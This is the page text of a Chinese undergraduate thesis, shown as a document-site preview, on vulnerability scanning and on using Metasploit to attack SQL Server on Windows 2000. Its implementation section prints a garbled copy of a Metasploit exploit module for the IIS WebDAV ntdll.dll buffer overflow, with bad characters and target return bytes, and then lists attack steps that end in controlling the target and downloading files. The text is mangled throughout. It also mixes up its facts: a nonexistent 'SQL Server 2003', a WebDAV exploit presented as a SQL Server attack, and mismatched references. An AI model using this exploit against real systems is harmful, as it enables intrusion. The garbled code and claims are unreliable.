基于metasploit的编程对sql server的漏洞扫描的设计与实现_第1页
基于metasploit的编程对sql server的漏洞扫描的设计与实现_第2页
基于metasploit的编程对sql server的漏洞扫描的设计与实现_第3页
基于metasploit的编程对sql server的漏洞扫描的设计与实现_第4页
基于metasploit的编程对sql server的漏洞扫描的设计与实现_第5页
已阅读5页,还剩22页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

基于METASPLOIT的编程对SQLSERVER的漏洞扫描的设计与实现THEDESIGNANDREALIZATIONFORTHEVULNERABILITYSCANOFTHESQLSERVERINWINDOWS2000SYSTEMBASEDONMETASPLOITFRAMEWORK学部电子信息学部专业计算机科学与技术毕业设计(论文)完成时间自2012年12月至2013年5月摘要互联网技术在不断的发展和前进,网络安全问题越来越受到人们的重视。与此同时,黑客在不断的利用漏洞进行攻击,而随着时间推移,越来越多的漏洞被发现和利用。企业迫切需求确保自身网络的安全,网络渗透评估受到越来越多的企业的重视。不仅仅是企业,个人也需要确保自己不会变为黑客攻击的对向,不让自己沦为肉鸡。文章主要从漏洞是什么以及如何扫描漏洞的概念,到主要的漏洞扫描工具,然后重点介绍了METASPLOITFRAMEWORK这个漏洞扫描工具的,最后利用METASPLOITFRAMEWORK模拟黑客对WINDOWS2000系统的SQLSERVER漏洞进行攻击。关键词METASPLOIT;SQLSERVER;EXPLOITSABSTRACTTHEINTERNETTECHNOLOGYINTHECONTINUOUSDEVELOPMENTANDPROGRESS,THEPROBLEMOFNETWORKSECURITYHASBEENPAIDMOREANDMOREATTENTIONATTHESAMETIME,THEHACKERATTACKSINTHEEXPLOITCONSTANTLY,BUTWITHTHEPASSAGEOFTIME,MOREANDMOREVULNERABILITIESAREDISCOVEREDANDUSEENTERPRISESURGENTLYNEEDTOENSURETHENETWORKSECURITY,NETWORKPENETRATIONASSESSMENTISVALUEDBYMOREANDMOREENTERPRISESTHEENTERPRISENOTJUST,ALSONEEDTOENSUREYOUDONTCHANGEFORHACKERSTO,DONOTALLOWYOURSELFTOBECOMEBROILERTHISARTICLEMAINLYFROMTHEVULNERABILITYISWHATANDHOWTOSCANVULNERABILITYCONCEPT,TOVULNERABILITYSCANNINGTOOLSMAINLY,ANDTHENINTRODUCESTHEMETASPLOITFRAMEWORKTHISVULNERABILITYSCANNINGTOOLS,FINALLYUSINGMETASPLOITFRAMEWORKSIMULATIONOFTHEHACKERWINDOWS2000SYSTEMSQLSERVERDRAINHOLEATTACKKEYWORDSMETASPLOIT;SQLSERVER;EXPLOITS目录1、漏洞的概述11漏洞111什么是漏洞112漏洞的特点13漏洞的分类22漏洞扫描221漏洞扫描的定义222漏洞扫描的原理2221PING扫描3222端口扫描32、漏洞扫描工具32漏洞扫描工具简介3(2)漏洞扫描的工具41流光介绍42XSCANNER介绍43NESSUS54俄罗斯的SSS6(3)现有的成熟漏洞扫描产品介绍63、METASPLOIT工具集和RUBY语言7(3)METASPLOIT工具简介71METASPLOIT介绍72METASPLOITFRAMEWORK的介绍82METASPLOIT模块介绍8漏洞扫描过程8(3)RUBY语言简介91RUBY语言来历与特点92RUBY语言语法简介94、WINDOWS2000的SQLSERVER2003漏洞扫描设计10(1)漏洞名称及描述10(2)受影响系统10(3)漏洞产生的原因10(4)由此漏洞扫描的总体设计115、WINDOWS2000的SQLSERVER2003漏洞扫描的实现及解决方案11(1)扫描过程161获取目标IP地址,并进行联通测试。162启动AMITAGE程序16(2)解决方案206、总结21参考文献22致谢231、漏洞的概述计算机对人类的生产活动和社会活动产生了极其重要的影响,并以强大的生命力飞速发展。随着计算机的发展,信息的交换变得越来越重要,网络的搭建越来越方便,可是随着信息化的快速发展,一些人企图窃取信息用来牟利,他们利用软件的漏洞来控制机器,因此了解漏洞是安全防范的必备基础,下面就来一起认识漏洞吧。1漏洞11什么是漏洞漏洞这里是特指您的WINDOWS操作系统或其应用程序在逻辑设计上的缺陷或在编写时产生的错误,这个缺陷或错误可以被不法者或者电脑黑客利用,通过植入木马、病毒等方式来攻击或控制整个电脑从而窃取您电脑中的重要资料和信息甚至破坏您的系统。12漏洞的特点1普遍的现象,这些错误绝大多数都是由于疏忽造成的。2数据处理例如对变量赋值比数值计算更容易出现逻辑错误,过小和过大的程序模块都比中等程序模块更容易出现错误。漏洞和具体的系统环境密切相关。在不同种类的。3软、硬件设备中,同种设备的不同版本之间,由不同设备构成的不同系统之间,以及同种系统在不同的设置条件下,都会存在各自不同的安全漏洞问题。漏洞问题与时间紧密。4相关。随着时间的推移,旧的漏洞会不断得到修补或纠正,新的漏洞会不断出现,因而漏洞问题会长期存在。受损状态是指已完成这种转变的状态,攻击是非受损状态到受损状态的状态转变过程。漏洞就是指区别于所有非受损状态的容易受攻击的状态特征。漏洞的上述特点决定了漏洞完整描述的独特性。在对漏洞进行研究时,除了需要掌握漏洞本身的特征属性,还要了解与漏洞密切相关的其它对象的特点。漏洞的基本属性有漏洞类型、造成的后果、严重程度、利用需求、环境特征等。与漏洞相关的对象包括存在漏洞的软硬件、操作系统、相应的补丁程序和修补漏洞的方法等。3漏洞的分类根据协议可以分为以下类型的漏洞CGICOMMONGATEWAYINTERFACE漏洞、POPPOSTOFFICEPROTOCO1漏洞、IISINTERNETINFORMATIONSERVER漏洞、FTPFILETRANSFERPROTOCO1漏洞、SSHSECURESHEL1漏洞、HTTPHYPERTEXTTRANSFERPROTOCO1漏洞、SMTPSIMPLEMAILTRANSFERPROTOCO1漏洞、IMAPINTERNETMESSAGEACCESSPROTOCO1漏洞、RPCREMOTEPROCEDURECAL1漏洞、FINGER漏洞和其他漏洞等。漏洞还可按可能对系统造成的威胁进行分类越权访问漏洞、信息泄漏漏洞、代码执行漏洞又分为缓冲区溢出漏洞、编码错误漏洞、类型误用漏洞、远程登陆漏洞、拒绝服务漏洞、逃避审计漏洞、密码传输漏洞等。2漏洞扫描21漏洞扫描的定义漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用的漏洞的一种安全检测(渗透攻击)行为。漏洞扫描的流程图(见图1)图122漏洞扫描的原理漏洞扫描可以划分为PING扫描、端口扫描、OS探测、脆弱点探测、防火墙扫描五种主要技术,每种技术实现的目标和运用的原理各不相同。按照TCPIP协议簇的结构,PING扫描工作在互联网络层端口扫描、防火墙探测工作在传输层;0S探测、脆弱点探测工作在互联网络层、传输层、应用层。PING扫描确定目标主机的IP地址,端口扫描探测目标主机所开放的端口,然后基于端口扫描的结果,进行OS探测和脆弱点扫描。失败获取主机IP地址扫描漏洞配置攻击参数对目标主机攻击获取机内资料成功221PING扫描PING扫描是指侦测主机IP地址的扫描。PING扫描的目的,就是确认目标主机的TCPIP网络是否联通,即扫描的IP地址是否分配了主机。对没有任何预知信息的黑客而言,PING扫描是进行漏洞扫描及入侵的第一步;对已经了解网络整体IP划分的网络安全人员来讲,也可以借助PING扫描,对主机的IP分配有一个精确的定位。大体上,PING扫描是基于ICMP协议的。其主要思想,就是构造一个ICMP包,发送给目标主机,从得到的响应来进行判断。根据构造ICMP包的不同,分为ECH0扫描和NONECHO扫描两种。222端口扫描端口扫描用来探测主机所开放的端口。端口扫描通常只做最简单的端口联通性测试,不做进一步的数据分析,因此比较适合进行大范围的扫描对指定IP地址进行某个端口值段的扫描,或者指定端口值对某个IP地址段进行扫描。根据端口扫描使用的协议,分为TCP扫描和UDP扫描。2、漏洞扫描工具2漏洞扫描工具简介漏洞扫描器是用于对企业网络进行漏洞扫描的一种硬件设备。传统的漏洞扫描器是在硬件内部设定好了自动检测远程或本地主机安全性弱点的程序。但基于SAAS云服务架构的QUALYSGUARD提供的漏洞扫描器则仅仅是一个用户搜集各类系统情况数据的工具,以用于和QUALYS终端SOC中的漏洞数据进行比对,以确认系统状况。通过使用漏洞扫描器,系统管理员能够发现所维护的WEB服务器的各种TCP端口的分配、提供的服务、WEB服务软件版本和这些服务及软件呈现在INTERNET上的安全漏洞。从而在计算机网络系统安全保卫战中做到“有的放矢“,及时修补漏洞,构筑坚固的安全长城。按常规标准,传统的漏洞扫描器可以分为两种类型主机漏洞扫描器(HOSTSCANNER)和网络漏洞扫描器(NETWORKSCANNER)。主机漏洞扫描器是用于在系统本地运行检测系统漏洞程序的,如COPS、TRIPEWIRE、TIGER等自由软件。网络漏洞扫描器是指对企业网络架构系统或者网站进行扫描的硬件设备。而QUALYS的扫描器基于它的运作模式,可以同时胜任对主机、企业网络系统及网站应用的扫描。(2)漏洞扫描的工具目前市场上有不少功能强大的扫描器。例如国内有流光,XSCAN;国外有TENABLIE出品的NESSUS、俄罗斯的SHADOWSECURITYSCANNER(SSS)。每种工具提供不同的特性,各具优势。1流光介绍流光是一款国产非常优秀的综合扫描工具,不仅具有完善的扫描功能,而且自带了很多猜解器和入侵工具,可方便的利用扫描的漏洞进行入侵。启动流光工具后可以看到它的主界面,熟悉流光的菜单和界面,利用它对目标主机进行漏洞扫描,是本实验的主要内容。流光FLUXAY5软件是一款免费软件,可从网络上下载之。注意在下载与安装时,本地主机要关闭病毒防火墙,以免本地主机主上的防毒软件将流光FLUXAY5的某些组件当作病毒而拒之门外、甚至删除。其具有如下功能1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测,消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。2XSCANNER介绍XSCANNER是国内最著名的综合扫描器之一,它完全免费,是不需要安装的绿色软件,界面支持中文和英文两种语言,包括图形界面和命令行方式。主要是由国内著名的民间入侵者组织“安全焦点”(HTTP/WWWXFOCUSNET)完成,从2000年的内部测试版XSCANV02到目前的最新版本XSCAN33都凝聚了国内众多入侵者的心血。XSCAN把扫描报告和安全焦点网站相连接,对扫描到的每个漏洞进行“风险等级”评估,并提供漏洞描述、漏洞溢出程序,方便网管测试、修补漏洞XSCANNER集成了多种扫描功能于一身,它可以采用多线程方式对指定IP地址段(或独立IP地址)进行安全漏洞扫描,提供了图形界面和命令行两种操作方式,扫描内容包括标准端口状态及端口BANNER信息、CGI漏洞、RPC漏洞、SQLSERVER默认帐户、FTP弱口令,NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/LOG/目录中,INDEX_HTM为扫描结果索引文件。对于一些已知的CGI和RPC漏洞,XSCANNER给出了相应的漏洞描述、利用程序及解决方案,节省了查找漏洞介绍的时间。3NESSUSTENABLIE出品的NESSUS(HTTP/WWWNESSUSORG)最初是一个开源的安全扫描项目,现在已经成为全世界最受欢迎的安全扫描系统,它具有以下特点1最全和最新的漏洞数据库。由于NESSUS源于开源项目,在全球范围内有大量人员在开发对新发现漏洞的检测。其漏洞数据库中的漏洞检测插件在不断更新,有一万多种,分为46类。2远程和本地安全检查。传统的网络安全扫描系统只能做远程开放网络服务的扫描,而NESSUS被设计为CLIENT/SEVER模式,既可以做基于网络的扫描也可以做基于主机的扫描,能显著地提高扫描速度并减少误报和漏报的概率。3智能的服务识别。NESSUS能识别出运行在非标准端口号上的常规服务,它是第一个实现该功能的安全扫描器,同时对于目标主机把同一个服务同时运行在几个不同端口号的情况,覆盖很多协议(如HTTP、SMTP、FTP、SNMP、RCP、LDAP以及TFTP)、后门、应用程序以及本地漏洞,NESSUS也能识别并作相应的安全检测。4常规检查和彻底检查。NESSUS提供了两种扫描模式常规扫描和完全扫描。常规扫描就是把一些具有危险和攻击性、可能引起被扫描对象崩溃的插件屏蔽,完全扫描则启用所有插件包括有攻击性的插件来观察扫描对象是否能抵御攻击。5采用基于NASL语言的插件模块。NASLNESSUSATTACKSCRIPTLANGUAGE是NESSUS的一大特色,它是专为NESSUS设计的脚本语言,用于开发安全扫描插件,现在己成为业界事实标准。在负端采用了PLUGIN1的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。6完整的报告。NESSUS有强大的报告输出能力,可以输出HTML、LATEX、ASCII文本、XML等多种格式。在报告中,它不仅指出发现存在的安全漏洞及风险分析,并且还能给出相应的解决办法5。4俄罗斯的SSSSSS(SHADOWSECURITYSCANNER)暗影安全扫描器是世界上唯一能够探测到惠普与思科,和其他网络设备故障的安全漏洞评估扫描器。是非常专业的安全漏洞扫描软件,能扫描服务器的各种漏洞,包括很多漏洞扫描、帐号扫描、DOS扫描等。安装好SSS后,打开SSS,它会自动进行更新,然后启动主界面。在系统扫描完成后,暗影安全扫描器会对收集到的数据进行分析,查找漏洞和优化在服务器中可能出现错误的选项,并提出解决问题的可能方式。(3)现有的成熟漏洞扫描产品介绍1天镜脆弱性扫描与管理系统安全自主掌控弱点全面评估天镜脆弱性扫描与管理系统是启明星辰自主研发的基于网络的脆弱性分析、评估和综合管理系统,启明星辰通过总结多年的市场经验和客户需求,提出了“发现扫描定性修复审核”弱点全面评估法则,能够快速发现网络资产,准确识别资产属性、全面扫描安全漏洞,清晰定性安全风险,给出修复建议和预防措施,并对风险控制策略进行有效审核,从而在弱点全面评估的基础上实现安全自主掌控。同时,天镜脆弱性扫描与管理系统支持扩展无线安全模块,可实时发现所覆盖区域内的无线设备、终端和信号分布情况,协助管理员识别非法无线设备、终端,帮助涉密单位发现无线信号,并可以进一步发现对无线设备不安全配置所存在的无线安全隐患,为您提供有线、无线网络脆弱性分析整体解决方案。天阗威胁检测与智能分析系统有如下特点(1)全面丰富的漏洞知识资源、天镜以启明星辰积极防御实验室(ADLABTM)为依托,以国内最权威、最全面的中文漏洞知识库(CNCVE)为支撑,蕴含着丰富的研究经验和深厚的知识积累,能够为客户提持续的、高品质的产品应用价值。覆盖面最广的漏洞库,天镜可扫描的漏洞数量超过2500种,分为32个大类,覆盖了当前网络环境中重要的,流行的系统和数据库漏洞,并且能够根据网络环境的变化及时调整更新,确保漏洞识别的全面性和时效性。全方位的网络对象支持,不仅支持多种操作系统、网络设备作为扫描对象,还具备对各种数据库的扫描能力,涵盖范围最全。2准确对象信息的准确识别、天镜采用渐进式扫描分析模式,采用操作系统指纹识别、智能化端口服务识别技术准确呈现扫描对象的各种信息漏洞信息的准确判断、除了使用常规方法扫描外,天镜还可以对于同一漏洞采用多种不同类型的扫描方法进行关联校验,以达到准确判断效果。域管理模式下的准确扫描、独有的WINDOWS域扫描技术,确保域管理模式下的扫描结果准确性。3快速强有力的扫描效率保证综合运用多种技术快速完成发现和扫描过程,在多项同类产品评比中扫描综合效率居领先地位。漏洞库的快速持续更新保持每两周的定期漏洞库更新,在发现重大漏洞时可随时更新。启明星辰是微软MAPP计划的成员,可提前获得微软每月安全公告SECURITYBULLETINS的信息,使得天镜对微软新漏洞可以做到快速及时跟进。2009年11月初,根据微软的安全公告,天镜做了及时更新,可以扫描WINDOWS7操作系统漏洞,天镜也成为了国内最早可以检测WINDOWS7安全漏洞的漏洞扫描产品。4自主完全自主知识产权天镜是具备完全自主知识产权的网络安全产品,获得国家保密部门的评测和认可,其安全性和保密性可自主掌控。领先的自主研究能力启明星辰ADLAB技术团队具备顶尖的安全漏洞自主发掘和验证能力,截止到2008年底,通过国际漏洞公布组织(CVE)独立发布了74个安全漏洞,遥遥领先于国内其它安全研究机构。同时,启明星辰也是唯一被授权查看微软源代码的国内漏洞扫描厂商。3、METASPLOIT工具集和RUBY语言(3)METASPLOIT工具简介1METASPLOIT介绍METASPLOIT是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当HDMOORE在2003年发布METASPLOIT时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为METASPLOIT团队一直都在努力开发各种攻击工具,并将它们贡献给所有METASPLOIT用户。METASPLOIT的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。2METASPLOITFRAMEWORK的介绍METASPLOITFRAMEWORK是一个编写,测试和使用EXPLOIT代码的完善环境。这个环境为渗透测试,SHELLCODE编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的PERL编程语言编写的,并带有由C语言,汇编程序和PYTHON编写的可选组件。2METASPLOIT模块介绍EXPLOIT负责对特定弱点进行攻击的特殊代码模块。在试图对一台计算机进行渗透时,必须决定采用什么方式进行攻击。METASPLOIT提供了很多跨越多种操作系统以及应用程序的漏洞,它可以对一台计算机进行多种途径的渗透。与传统单一的利用不同,METASPLOIT仅仅触发易受攻击的条件,不提供任何基于SHELL代码或者高级编码的渗透。诸如SHELL代码、编码以及NOPSLED均由其他可插入模块提供。有效载荷PAYLOADS一旦漏洞被触发,有效负荷就可以封装攻击所要的任何功能。当试图触发一种漏洞之后,下一个步骤就是在目标计算机上进行某种动作,诸如获得对SHELL命令行的访问,或者下载后门安装程序。通过选择METASPOIT有效载荷,就选择了在利用漏洞成功时所发生的事情。在底层协议中,有效载荷作为与漏洞利用一起发送的“SHELL代码”而进行编码。漏洞扫描过程METASPLOITFRAMEWORK利用EXPLOIT对目标系统进行攻击时,其工作流程与漏洞扫描过程(见图1)类似,但又有其独特性。METASPLOITFRAMEWORK的模块可以嵌入NMAP和NESSUS的功能进入到网络中。此时,NMAP、NESSUS可以帮助识别在网络中的主机的系统版本、开放端口、可接入的服务以及这些服务潜在的漏洞。此外,NMAP和NESSUS这些侦查模块本身就能很方便的实现端口扫描和漏洞评估。这些服务使得METASPLOITFRAMEWORK初始化是就已经是一个非常强大的工具。我们可以通过命令让开启MSF的数据库支持服务,然后通过NMAP进行端口扫描,再对目标网络进行自动扫描。这样将会自动触发数据库中的EXPLOIT和有效载荷(PAYLOAD)对目标主机进行攻击7。但是,本文章采用的是另一种攻击方式,是针对明确的漏洞,使用明确的EXPLOIT对目标进行攻击。(3)RUBY语言简介1RUBY语言来历与特点RUBY的作者于1993年2月24日开始编写RUBY,直至1995年12月才正式公开发布于FJ(新闻组)。之所以称为RUBY,是因为PERL的发音与6月的诞生石PEARL(珍珠)相同,因此RUBY以7月的诞生石RUBY(红宝石)命名。RUBY明显比其他类似的编程语言(如PERL或PYTHON)年轻,又因为RUBY是日本人发明的,所以早期的非日文资料和程序都比较贫乏,所以现在在网上仍然可以找到RUBY的资料太少之类的批评。约于2000年,RUBY开始进入美国,英文的资料开始发展。这些使RUBY在日本得到的关注远远超过了PERL和PYTHON。RUBY是一种用途广泛的语言,作为脚本语言,RUBY程序可以像其他脚本语言一样用于做UNIX、SHELL或者WINDOWS命令行脚本。RUBY的功能却不仅仅限于脚本开发。我们也可以用RUBY编写GUI应用程序;可以用它做文本的排版、整理以及提取目录等;可以用它对网络服务器和数据库进行管理;还可以将它用于网页服务,可以用RUBY为数据库做界面连接,用RUBY生成动态的网页等。2RUBY语言语法简介RUBY的语法简单、语义清晰,由RUBY写出的程序简单明了,易于理解和掌握。与此同时,RUBY中的类和模块都可以动态扩充,变量没有类型定义。因此,在对已完成的代码做扩充和修改时,常常不需要对原有代码上做任何改动,可以方便程序管理。RUBY又是一个开放式语言,如果使用中发现RUBY缺乏某些功能,可以用RUBY或者C语言对RUBY进行扩充8。在RUBY中编程无需声明变量的类型,这是因为RUBY里任何东西都是对象RUBY变量保存的是对象的引用。RUBY具有很好的“兼容性”,其他语言的程序,尤其是面向对象和脚本语言的程序,通过很少改动就能被RUBY接受,并且常常会有更出色的表现。RUBY的有点还在于它具有完整的元类模型、良好的遍历器、以及闭包、映像等特征。还有,RUBY不仅支持对类的扩充,也支持对单独对象的扩充。减少编程时候的不必要的琐碎时间,令编写程序的人高兴,是设计RUBY语言的MATZ的一个首要的考虑;其次是良好的界面设计。他强调系统设计必须强调人性化,而不是一味从机器的角度设想。“人们特别是电脑工程师们,常常从机器着想。他们认为“这样做,机器就能运行的更快;这样做,机器运行效率更高;这样做,机器就会怎样怎样怎样。”实际上,我们需要从人的角度考虑问题,人们怎样编写程序或者怎样使用机器上应用程序。我们是主人,他们是仆人。”遵循上述的理念,RUBY语言通常非常直观,按照编程人认为它应该的方式运行。4、WINDOWS2000的SQLSERVER2003漏洞扫描设计(1)漏洞名称及描述名称MICROSOFTSQLSERVER2000服务远程堆栈缓冲区溢出漏洞描述客户端可以通过发送消息到这个端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将导致缓冲区溢出,恶意黑客利用此漏洞可以在远程机器上执行自己准备好的恶意代码。(2)受影响系统MICROSOFTWINDOWS2000PROFESSIONAL/SERVER/MICROSOFTSQLSERVER2003企业版(3)漏洞产生的原因此漏洞主要是由于WINDOWSSQLSERVER2003的后台端口开放导致,1433和1434为数据库端口,安全性并没有得到保障,由于许多用户都采用弱口令导致系统管理员权限被篡夺,从而登录进系统(4)由此漏洞扫描的总体设计根据对漏洞扫描相关知识的了解,以及收集到的关于漏洞的信息,由此产生的设计如下(见图2)否是否开启METASPOLITE内核程序PING通目标主机扫描目标主机已知漏洞,检测可用漏洞进行攻击测试记录结果是图2IIS50_WEBDAV漏洞扫描流程5、WINDOWS2000的SQLSERVER2003漏洞扫描的实现及解决方案我们基于METASPLOIT的FRAMEWORK基础上编写的RUBY语言的代码REQUIREMSF/CORERUBY的库模块都存放在FRAMEWORK3FRAMEWORKLIBMSFCORE,其中包括EXPLOITRB等CLASSMETASPLOIT3MICROSOFTIIS50WEBDAVNTDLLDLLPATHOVERFLOW,DESCRIPTIONQTHISEXPLOITSABUFFEROVERFLOWINNTDLLDLLONWINDOWS2000THROUGHTHESEARCHWEBDAVMETHODINIISTHISPARTICULARMODULEONLYWORKSAGAINSTWINDOWS2000ITSHOULDHAVEAREASONABLECHANCEOFSUCCESSAGAINSTANYSERVICEPACK,AUTHORHDM,LICENSEMSF_LICENSE,VERSIONREVISION14774,REFERENCESCVE,20020649,OSVDB,4578,BID,5310,PRIVILEGEDTURE变量SPACE代表许可的PAYLOAD字节数的最大值;BADCHARS代表可能中断PAYLOAD的字符,需要在编码是去除;STACKADJUSTMENT是对栈的调整PAYLOADSPACE512,BADCHARS“X00X3AX26X3FX25X23X20X0AX0DX2FX2BX0BX5C“,STACKADJUSTMENT3500,PLATFORM指向WIN类型PLATFORMWIN,TARGETS自动加载PAYLOADS,采用MSF的默认信息TARGETSAUTOMATICBRUTEFORCE,DISCLOSUREDATEMAY302003,DEFAULTTARGET0下段程序制定了部分变量,在调用此程序段的时候再赋值REGISTER_EVASION_OPTIONSOPTBOOLNEWINVALID_SEARCH_REQUEST,FALSE,REPLACETHEVALIDXMLSEARCHWITHRANDOMDATA,FALSE,OPTENUMNEWHTTPURI_ENCODE,FALSE,ENABLEURIENCODING,NONE,NONE,HEXNORMAL,NONE,SELFCLASSDEREGISTER_OPTIONSHTTPJUNK_PARAMS,HTTPHEADER_FOLDINGENDDEFAUTOFILTER若默认漏洞扫描工具会扫描端口445和端口139,将其改为走80端口RPORTDATASTORERPORTTO_IIFRPORT139ORRPORT445RPORT80ENDTRUEEND下段程序用来检查参数设定情况,以及目标是否可以攻击DEFCHECKURLX65535XML“RNRN“RNSELECT“DAVDISPLAYNAME“FROMSCOPERNRNRN“RESPONSESEND_REQUEST_CGIURI/URL,CTYPETEXT/XML,METHODSEARCH,DATAXML,5IFRESPONSEANDRESPONSEBODY/SERVERERROREXCEPTION/RETURNEXPLOITCHECKCODEVULNERABLEENDDIDTHESERVERSTOPACCEPINGREQUESTSBEGINSEND_REQUEST_RAWURI/,5RESCUERETURNEXPLOITCHECKCODEVULNERABLEENDRETURNEXPLOITCHECKCODESAFEENDDEFEXPLOIT首先验证服务正在运行SEND_REQUEST_RAWURI/,5能进行攻击的目标系统TARGETSWINDOWS2000的这些系统都能成为目标“X4FX4E“,SP3“X41X42“,SP0SP2“X41X43“,SP1,SP2“X41XC1“,“X41XC3“,“X41XC9“,“X41XCA“,“X41XCB“,“X41XCC“,“X41XCD“,“X41XCE“,“X41XCF“,“X41XD0“,(1)扫描过程1获取目标IP地址,并进行联通测试。2启动AMITAGE程序3输入本机IP地址4对目标IP机器进行扫描5获取目标电脑信息并分析漏洞信息6根据漏洞信息配置渗透攻击程序7入侵成功并对目标机器进行控制,下载文件(2)解决方案针对上述漏洞,通过手动指定服务器端口(SQL设置高级服务端口修改)或者升级数据库版本到2008以上方可解决。6、总结本次实验成功的对WINDOWS2000的SQLSERVER2003进行了攻击,找到了目标系统的漏洞,达到了实验设计的目的。通过模拟渗透攻击,了解了黑客的入侵

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论